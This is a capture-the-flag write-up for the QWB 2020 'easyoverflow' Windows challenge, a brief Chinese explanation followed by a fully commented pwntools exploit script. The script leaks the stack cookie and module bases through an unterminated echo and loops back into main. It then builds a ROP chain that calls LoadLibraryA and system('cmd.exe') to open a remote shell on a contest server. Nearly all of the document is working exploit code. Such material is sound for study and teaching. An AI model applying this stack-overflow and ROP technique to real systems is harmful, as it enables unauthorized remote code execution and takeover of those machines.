
qwb2020_easyoverflow

栈溢出，可以利用 3 次

由于没有截断字符串，因此 puts 可以泄露出栈里的数据；在最后一次我们做 ROP 重新回到 main 函数再一次进行利用，泄露出其他数据。由于 Windows 上调用 WriteFile 的参数太多了，我们就直接使用 kernel32.dll 里的 LoadLibraryA 获得 ucrtbase.dll 的加载地址，然后得到 system 地址，调用 system("cmd.exe") 来 getshell。

#coding:utf8
from pwn import *


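#context.log_level = 'debug'
# Target selector: True = the author's local test VM, False = the contest server.
# Everything below is a build-specific offset, not an address: the gadget and
# LoadLibraryA offsets are added to kernel32_base once it is leaked (round 2),
# pop_rcx to ntdll_base (round 3), and system_offset to the ucrtbase.dll base
# that LoadLibraryA returns.  The values are only meaningful for the exact DLL
# builds of the chosen host.
# (The pasted original had lost the indentation of the two branches below,
# which is an IndentationError; restored here, values unchanged.)
Local = False


if Local:
    # distance from the module base to the stack value leaked in rounds 2 / 3
    kernel32_offset = 0x84d4
    ntdll_offset = 0x6E871
    # write primitive used to place strings in .data:
    # add dword ptr [rbp - 0x14], esi ; mov eax, edx ; ret
    add_p_rbp_esi = 0x4c464
    pop_rbp = 0x1281
    pop_rsi = 0x2481
    pop_rcx = 0x95da5        # ntdll gadget; the rest are kernel32 gadgets
    LoadLibraryA = 0x1FB90
    add_rax_rcx = 0x72722
    jmp_rax = 0x258e0
    system_offset = 0xA40C0  # system() relative to the ucrtbase.dll base
    sh = remote('192.168.232.137',6666)
else:
    # same set of offsets for the remote (contest) build
    kernel32_offset = 0x17974
    ntdll_offset = 0x6A271
    # add dword ptr [rbp - 0x14], esi ; mov eax, edx ; ret
    add_p_rbp_esi = 0x493a0
    pop_rbp = 0x120c
    pop_rsi = 0x1661
    pop_rcx = 0x9217b        # ntdll gadget
    LoadLibraryA = 0x1F220
    add_rax_rcx = 0x5dc9
    jmp_rax = 0x236e0
    system_offset = 0xABBA0  # system() relative to the ucrtbase.dll base
    sh = remote('39.99.46.209',13389)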


# Round 1.  Each trip through main() gives three inputs: the first two are
# echoed back (and used here to leak), the third overflows the return address.
# The author notes the overflow can be used three times per run, which is why
# the chain has to return into main for more.
# Root cause, for the record: the input lands in a fixed 0x100-byte stack
# buffer with neither a bound nor a terminator and is then echoed, so the echo
# keeps printing past the buffer (cookie, saved pointers) and the write itself
# overruns the frame.  Bounding the read and NUL-terminating the buffer would
# close both the leak and the overflow.

# Input 1: fill the buffer exactly; the echo then continues into the 8 bytes
# right after it, which are the /GS stack cookie (the same slot the final
# overflow has to restore at offset 0x100).  The echo stops at the first NUL
# byte, so fewer than 8 bytes may come back; ljust() pads them.  A NUL among
# the low bytes of the cookie would truncate the leak -- not handled here.
sh.sendafter('input:','a'*0x100)
sh.recvuntil('a'*0x100)
stack_cookie = u64(sh.recvuntil('\r\n',drop = True).ljust(8,'\x00'))
print 'stack_cookie=',hex(stack_cookie)


# Input 2: 0x118 bytes reach the saved return address (the slot the third
# input overwrites below).  A user-mode x64 pointer has two zero high bytes,
# so exactly 6 bytes are echoed before the NUL; 0x12f4 is the RVA of that
# return site in the executable, which gives the image base and from it the
# .data scratch area (RVA 0x3e80) used later for strings and main (RVA 0x1000).
sh.sendafter('input:','a'*0x118)
sh.recvuntil('a'*0x118)
exe_base = u64(sh.recv(6).ljust(8,'\x00')) - 0x12f4
data_addr = exe_base + 0x3e80
print 'exe_base=',hex(exe_base)
print 'data_addr=',hex(data_addr)
main_addr = exe_base + 0x1000
# Input 3: buffer | cookie (kept intact so the /GS check passes) | 0x10 bytes
# of filler (saved registers, presumably -- the chain does not rely on them) |
# return address = main, so the program restarts and hands out three more inputs.
sh.sendafter('input:','a'*0x100 + p64(stack_cookie) + 'a'*0x10 + p64(main_addr))


# Round 2.  The cookie is leaked again rather than reused: the x64 /GS cookie
# is stored XORed with rsp, and after the ROP re-entry main runs at a different
# stack depth, so the stored value differs -- presumably why the author
# re-reads it every round; confirm.
sh.sendafter('input:','a'*0x100)
sh.recvuntil('a'*0x100)
stack_cookie = u64(sh.recvuntil('\r\n',drop = True).ljust(8,'\x00'))
print 'stack_cookie=',hex(stack_cookie)
# Leak the kernel32.dll base: 0x150 bytes up the stack sits a pointer into
# kernel32 (a frame above main's; the exact owner is not visible here).
# kernel32_offset is its distance from the module base for this build.
sh.sendafter('input:','a'*0x150)
sh.recvuntil('a'*0x150)
kernel32_base = u64(sh.recv(6).ljust(8,'\x00')) - kernel32_offset
print 'kernel32_base=',hex(kernel32_base)
# Rebase the kernel32 gadget offsets in place.  One-shot: running these lines
# twice would add the base a second time.
add_p_rbp_esi += kernel32_base
pop_rbp += kernel32_base
pop_rsi += kernel32_base
LoadLibraryA += kernel32_base
add_rax_rcx += kernel32_base
jmp_rax += kernel32_base
# Input 3: same cookie-preserving overflow as round 1, back into main.
sh.sendafter('input:','a'*0x100 + p64(stack_cookie) + 'a'*0x10 + p64(main_addr))
# Round 3: fresh cookie (see round 2 for why), then a pointer into ntdll.dll
# found 0x178 bytes up the stack.
sh.sendafter('input:','a'*0x100)
sh.recvuntil('a'*0x100)
stack_cookie = u64(sh.recvuntil('\r\n',drop = True).ljust(8,'\x00'))
print 'stack_cookie=',hex(stack_cookie)
# Leak the ntdll.dll base; ntdll_offset is the leaked value's distance from it.
sh.sendafter('input:','a'*0x178)
sh.recvuntil('a'*0x178)
ntdll_base = u64(sh.recv(6).ljust(8,'\x00')) - ntdll_offset
print 'ntdll_base=',hex(ntdll_base)
# Only pop_rcx lives in ntdll, so it is the one offset rebased here (one-shot).
pop_rcx += ntdll_base
# Input 3: return to main once more for the final round.
sh.sendafter('input:','a'*0x100 + p64(stack_cookie) + 'a'*0x10 + p64(main_addr))


# Round 4 (final): cookie for the last frame.
sh.sendafter('input:','a'*0x100)
sh.recvuntil('a'*0x100)
stack_cookie = u64(sh.recvuntil('\r\n',drop = True).ljust(8,'\x00'))
print 'stack_cookie=',hex(stack_cookie)
# The second input is a short dummy: nothing is leaked from it, it only
# consumes the input slot so that the third input can carry the chain below.
sh.sendafter('input:','haivk')


# Final ROP chain.  Frame layout of the overflow:
#   0x000  'a' * 0x100    buffer
#   0x100  cookie         restored from the round-4 leak so the /GS check passes
#   0x108  'a' * 8        filler
#   0x110  system_offset  slot just below the return address; its role is not
#                         evident -- the chain recomputes system() with
#                         add_rax_rcx further down, so this may be a leftover;
#                         confirm before relying on it
#   0x118  return address -> first gadget
payload = 'a'*0x100 + p64(stack_cookie) + 'a'*0x8 + p64(system_offset)
# Write "ucrtbase.dll\0" into .data four bytes at a time with the gadget
# `add dword ptr [rbp - 0x14], esi`: rbp is loaded with target + 0x14 to cancel
# the gadget's displacement, esi holds the little-endian chunk.  Because it is
# an add rather than a mov, this assumes the target dwords are zero beforehand
# (unused, zero-initialised .data at RVA 0x3e80 -- confirm).
payload += p64(pop_rbp) + p64(data_addr + 0x14)
payload += p64(pop_rsi) + p64(0x74726375)          # "ucrt"
payload += p64(add_p_rbp_esi)
payload += p64(pop_rbp) + p64(data_addr + 0x4 + 0x14)
payload += p64(pop_rsi) + p64(0x65736162)          # "base"
payload += p64(add_p_rbp_esi)
payload += p64(pop_rbp) + p64(data_addr + 0x8 + 0x14)
payload += p64(pop_rsi) + p64(0x6C6C642E)          # ".dll"
payload += p64(add_p_rbp_esi)
payload += p64(pop_rbp) + p64(data_addr + 0xC + 0x14)
payload += p64(pop_rsi) + p64(0)                   # NUL terminator
payload += p64(add_p_rbp_esi)
# Write "cmd.exe\0" at data_addr + 0x10 the same way.
payload += p64(pop_rbp) + p64(data_addr + 0x10 + 0x14)
payload += p64(pop_rsi) + p64(0x2E646D63)          # "cmd."
payload += p64(add_p_rbp_esi)
payload += p64(pop_rbp) + p64(data_addr + 0x14 + 0x14)
payload += p64(pop_rsi) + p64(0x657865)            # "exe\0"
payload += p64(add_p_rbp_esi)


# LoadLibraryA("ucrtbase.dll"): rcx carries the first argument (Win64
# convention) and the module base comes back in rax.  The pop_rsi just before
# the call loads the add_rax_rcx address into rsi; its purpose is not evident
# from the chain (rsi is not an argument here) -- confirm.
payload += p64(pop_rcx) + p64(data_addr) + p64(pop_rsi) + p64(add_rax_rcx) + p64(LoadLibraryA)
# rax = ucrtbase base + system_offset = system
payload += p64(pop_rcx) + p64(system_offset) + p64(add_rax_rcx)
# rcx = "cmd.exe", then jmp rax -> system("cmd.exe")
payload += p64(pop_rcx) + p64(data_addr + 0x10) + p64(jmp_rax)


# Wait for Enter before firing the chain (time to attach a debugger to the
# target, presumably), deliver it as the third input of round 4, then hand the
# resulting session to the user.
raw_input()
sh.sendafter('input:',payload)

sh.interactive()